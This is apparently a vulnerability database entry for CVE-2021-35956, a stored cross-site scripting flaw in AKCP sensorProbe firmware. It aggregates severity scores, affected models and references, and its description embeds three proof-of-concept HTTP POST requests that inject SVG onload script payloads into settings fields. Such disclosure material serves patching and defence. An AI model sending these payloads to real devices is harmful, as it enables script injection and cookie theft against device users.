Details of VAR-202106-1093

ID

VAR-202106-1093

CVE

CVE-2021-35956

TITLE

AKCP sensorProbe cross-site scripting vulnerability

Trust: 1.2

sources: CNVD: CNVD-2021-46654 // CNNVD: CNNVD-202106-1985

DESCRIPTION

Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials. 1) Stored Cross-Site Scripting via System Settings POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save 2) Stored Cross-Site Scripting via Email Settings POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save 3) Stored Cross-Site Scripting via Sensor Description POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close _WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save

Trust: 1.62

sources: NVD: CVE-2021-35956 // CNVD: CNVD-2021-46654 // VULMON: CVE-2021-35956 // PACKETSTORM: 163343

IOT TAXONOMY

category:	['Network device']	sub_category:	-	Trust: 0.6
category:	['embedded device']	sub_category:	sensor	Trust: 0.1

sources: OTHER: None // CNVD: CNVD-2021-46654

AFFECTED PRODUCTS

vendor:	akcp	model:	sensorprobe4	scope:	lt	version:	sp480-20210624	Trust: 1.0
vendor:	akcp	model:	sensorprobe8-x60	scope:	lt	version:	sp480-20210624	Trust: 1.0
vendor:	akcp	model:	sensorprobe2	scope:	lt	version:	sp480-20210624	Trust: 1.0
vendor:	akcp	model:	sensorprobe8	scope:	lt	version:	sp480-20210624	Trust: 1.0
vendor:	akcp	model:	sensorprobe8-x20	scope:	lt	version:	sp480-20210624	Trust: 1.0
vendor:	akcp	model:	sensorprobe <sp480-20210624	scope:	-	version:	-	Trust: 0.6

sources: CNVD: CNVD-2021-46654 // NVD: CVE-2021-35956

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2021-35956
value:	MEDIUM
Trust: 1.0
CNVD:	CNVD-2021-46654
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-202106-1985
value:	MEDIUM
Trust: 0.6
VULMON:	CVE-2021-35956
value:	LOW
Trust: 0.1

nvd@nist.gov:	CVE-2021-35956
severity:	LOW
baseScore:	3.5
vectorString:	AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	SINGLE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	6.8
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.1
CNVD:	CNVD-2021-46654
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6

nvd@nist.gov:	CVE-2021-35956
baseSeverity:	MEDIUM
baseScore:	5.4
vectorString:	CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	REQUIRED
scope:	CHANGED
confidentialityImpact:	LOW
integrityImpact:	LOW
availabilityImpact:	NONE
exploitabilityScore:	2.3
impactScore:	2.7
version:	3.1
Trust: 1.0

sources: CNVD: CNVD-2021-46654 // VULMON: CVE-2021-35956 // CNNVD: CNNVD-202106-1985 // NVD: CVE-2021-35956

PROBLEMTYPE DATA

problemtype:

CWE-79

Trust: 1.0

sources: NVD: CVE-2021-35956

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202106-1985

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 163343 // CNNVD: CNNVD-202106-1985

PATCH

title:

CVE-2021-35956

url:

https://github.com/tcbutler320/CVE-2021-35956

Trust: 0.1

sources: VULMON: CVE-2021-35956

EXTERNAL IDS

db:	NVD	id:	CVE-2021-35956	Trust: 2.5
db:	PACKETSTORM	id:	163343	Trust: 1.8
db:	CNVD	id:	CNVD-2021-46654	Trust: 0.6
db:	EXPLOIT-DB	id:	50080	Trust: 0.6
db:	CNNVD	id:	CNNVD-202106-1985	Trust: 0.6
db:	OTHER	id:	NONE	Trust: 0.1
db:	VULMON	id:	CVE-2021-35956	Trust: 0.1

sources: OTHER: None // CNVD: CNVD-2021-46654 // VULMON: CVE-2021-35956 // PACKETSTORM: 163343 // CNNVD: CNNVD-202106-1985 // NVD: CVE-2021-35956

REFERENCES

url:	https://tbutler.org/2021/06/28/cve-2021-35956	Trust: 1.8
url:	https://www.akcp.com/support-center/customer-login/sensor-probe-firmware-changelog/	Trust: 1.7
url:	http://www.akcp.in.th/downloads/firmwares/sp480-20210624.zip	Trust: 1.7
url:	http://packetstormsecurity.com/files/163343/akcp-sensorprobe-spx476-cross-site-scripting.html	Trust: 1.7
url:	https://nvd.nist.gov/vuln/detail/cve-2021-35956	Trust: 1.3
url:	https://www.exploit-db.com/exploits/50080	Trust: 0.6
url:	https://ieeexplore.ieee.org/abstract/document/10769424	Trust: 0.1
url:	https://cwe.mitre.org/data/definitions/79.html	Trust: 0.1
url:	https://github.com/tcbutler320/cve-2021-35956	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	http://[target]/mail?time=32e004c941f912	Trust: 0.1
url:	http://[target]/senswatr?index=0&time=32e004c941f912	Trust: 0.1
url:	http://[target]	Trust: 0.1
url:	https://www.akcp.com/	Trust: 0.1
url:	https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/	Trust: 0.1
url:	http://[target]/system?time=32e004c941f912	Trust: 0.1

sources: OTHER: None // CNVD: CNVD-2021-46654 // VULMON: CVE-2021-35956 // PACKETSTORM: 163343 // CNNVD: CNNVD-202106-1985 // NVD: CVE-2021-35956

CREDITS

Tyler Butler

Trust: 0.1

sources: PACKETSTORM: 163343

SOURCES

db:	OTHER	id:	-
db:	CNVD	id:	CNVD-2021-46654
db:	VULMON	id:	CVE-2021-35956
db:	PACKETSTORM	id:	163343
db:	CNNVD	id:	CNNVD-202106-1985
db:	NVD	id:	CVE-2021-35956

LAST UPDATE DATE

2025-01-30T19:49:00.537000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2021-46654	date:	2021-07-02T00:00:00
db:	VULMON	id:	CVE-2021-35956	date:	2021-07-06T00:00:00
db:	CNNVD	id:	CNNVD-202106-1985	date:	2021-07-07T00:00:00
db:	NVD	id:	CVE-2021-35956	date:	2021-07-06T13:20:33.377

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2021-46654	date:	2021-07-02T00:00:00
db:	VULMON	id:	CVE-2021-35956	date:	2021-06-30T00:00:00
db:	PACKETSTORM	id:	163343	date:	2021-07-02T15:30:25
db:	CNNVD	id:	CNNVD-202106-1985	date:	2021-06-30T00:00:00
db:	NVD	id:	CVE-2021-35956	date:	2021-06-30T12:15:07.683